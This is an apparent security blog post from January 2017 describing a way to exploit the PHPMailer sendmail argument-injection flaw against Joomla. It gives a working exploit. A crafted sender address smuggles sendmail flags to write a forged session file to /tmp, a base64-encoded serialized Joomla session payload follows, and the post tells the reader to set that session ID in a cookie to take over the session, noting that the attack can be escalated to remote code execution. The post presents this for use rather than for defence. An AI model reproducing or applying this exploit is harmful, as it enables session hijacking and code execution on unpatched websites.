понедельник, 2 января 2017 г.

Using PHPMailer vulnerability to take the session

At the end of 2016 world was shocked by remote code execution exploit for PHPMailer. 

It's a very common 3rd party library which used by Drupal, WordPress, Joomla and numbers of others top web projects.


The reason of this vulnerability is an incorrect data filtration in the email address while using it as a argument for the sendmail utility execution via system shell. As a result, remote attacker can upload arbitrary file by using -X argument.

Obvious way to exploit this is a web shell upload. However, it depends on two different requirements:
  1. Attacker should know full path to the web root directory (like /var/www)
  2. Web application should have file system privileges to write into one of the web directories.
We suggest another one way to exploit this vulnerability with no described requirements. It's session file upload way. 

For Joomla the exploit could looks like:
$email_from = '"attacker\" -oQ/tmp/ -X/tmp/sess_f8af03562e674480401098254fe223e0  some"@email.com';
$msg_body  = 'joomla|s:1572:"TzoyNDoiSm9vbWxhXFJlZ2lzdHJ5XFJlZ2lzdHJ5IjozOntzOjc6IgAqAGRhdGEiO086ODoic3RkQ2xhc3MiOjE6e3M6OToiX19kZWZhdWx0IjtPOjg6InN0ZENsYXNzIjozOntzOjc6InNlc3Npb24iO086ODoic3RkQ2xhc3MiOjM6e3M6NzoiY291bnRlciI7aTo4O3M6NToidGltZXIiO086ODoic3RkQ2xhc3MiOjM6e3M6NToic3RhcnQiO2k6MTQ4MzM4ODA2MztzOjQ6Imxhc3QiO2k6MTQ4MzM4ODEzNjtzOjM6Im5vdyI7aToxNDgzMzg4MzY1O31zOjU6InRva2VuIjtzOjMyOiJuWmx5ZFdYMUN4M1VnbjhRbWNLN0RnRGJNTkZBMVFkeSI7fXM6ODoicmVnaXN0cnkiO086MjQ6Ikpvb21sYVxSZWdpc3RyeVxSZWdpc3RyeSI6Mzp7czo3OiIAKgBkYXRhIjtPOjg6InN0ZENsYXNzIjowOnt9czoxNDoiACoAaW5pdGlhbGl6ZWQiO2I6MTtzOjk6InNlcGFyYXRvciI7czoxOiIuIjt9czo1OiJzZXR1cCI7Tzo4OiJzdGRDbGFzcyI6Mjp7czo3OiJoZWxwdXJsIjtzOjc0OiJodHRwczovL2hlbHAuam9vbWxhLm9yZy9wcm94eS9pbmRleC5waHA/a2V5cmVmPUhlbHB7bWFqb3J9e21pbm9yfTp7a2V5cmVmfSI7czo3OiJvcHRpb25zIjthOjE1OntzOjk6InNpdGVfbmFtZSI7czoxNDoicnVzc2lhLXJlbGF0ZWQiO3M6MTE6ImFkbWluX2VtYWlsIjtzOjEyOiJhc2RAYXNkcy5jb20iO3M6MTA6ImFkbWluX3VzZXIiO3M6NToiYWRtaW4iO3M6MTQ6ImFkbWluX3Bhc3N3b3JkIjtzOjI4OiJydXNzaWEtcmVsYXRlZHJ1c3NpYS1yZWxhdGVkIjtzOjEzOiJzaXRlX21ldGFkZXNjIjtzOjA6IiI7czoxMjoic2l0ZV9vZmZsaW5lIjtpOjA7czo4OiJsYW5ndWFnZSI7czo1OiJlbi1VUyI7czo3OiJoZWxwdXJsIjtzOjc0OiJodHRwczovL2hlbHAuam9vbWxhLm9yZy9wcm94eS9pbmRleC5waHA/a2V5cmVmPUhlbHB7bWFqb3J9e21pbm9yfTp7a2V5cmVmfSI7czo3OiJkYl90eXBlIjtzOjY6Im15c3FsaSI7czo3OiJkYl9ob3N0IjtzOjk6IjEyNy4wLjAuMSI7czo3OiJkYl91c2VyIjtzOjQ6InJvb3QiO3M6NzoiZGJfcGFzcyI7czoxMjoibXktc2VjcmV0LXB3IjtzOjc6ImRiX25hbWUiO3M6NDoidGVzdCI7czo2OiJkYl9vbGQiO3M6NjoiYmFja3VwIjtzOjk6ImRiX3ByZWZpeCI7czo2OiJwa2M2cV8iO319fX1zOjE0OiIAKgBpbml0aWFsaXplZCI7YjowO3M6OToic2VwYXJhdG9yIjtzOjE6Ii4iO30=";';

Then set the value f8af03562e674480401098254fe223e0 in Cookie and take a profit :)

Moreover, in Joomla case it's also serialized data inside this base64 body:
O:24:"Joomla\Registry\Registry":3:{s:7:"*data";O:8:"stdClass":1:{s:9:"__default";O:8:"stdClass":3:{s:7:"session";O:8:"stdClass":3:{s:7:"counter";i:8;s:5:"timer";O:8:"stdClass":3:{s:5:"start";i:1483388063;s:4:"last";i:1483388136;s:3:"now";i:1483388365;}s:5:"token";s:32:"nZlydWX1Cx3Ugn8QmcK7DgDbMNFA1Qdy";}s:8:"registry";O:24:"Joomla\Registry\Registry":3:{s:7:"*data";O:8:"stdClass":0:{}s:14:"*initialized";b:1;s:9:"separator";s:1:".";}s:5:"setup";O:8:"stdClass":2:{s:7:"helpurl";s:74:"https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}";s:7:"options";a:15:{s:9:"site_name";s:14:"russia-related";s:11:"admin_email";s:12:"asd@asds.com";s:10:"admin_user";s:5:"admin";s:14:"admin_password";s:28:"russia-relatedrussia-related";s:13:"site_metadesc";s:0:"";s:12:"site_offline";i:0;s:8:"language";s:5:"en-US";s:7:"helpurl";s:74:"https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}";s:7:"db_type";s:6:"mysqli";s:7:"db_host";s:9:"127.0.0.1";s:7:"db_user";s:4:"root";s:7:"db_pass";s:12:"my-secret-pw";s:7:"db_name";s:4:"test";s:6:"db_old";s:6:"backup";s:9:"db_prefix";s:6:"pkc6q_";}}}}s:14:"*initialized";b:0;s:9:"separator";s:1:".";}

So, the attacker could also upgrade this to the RCE.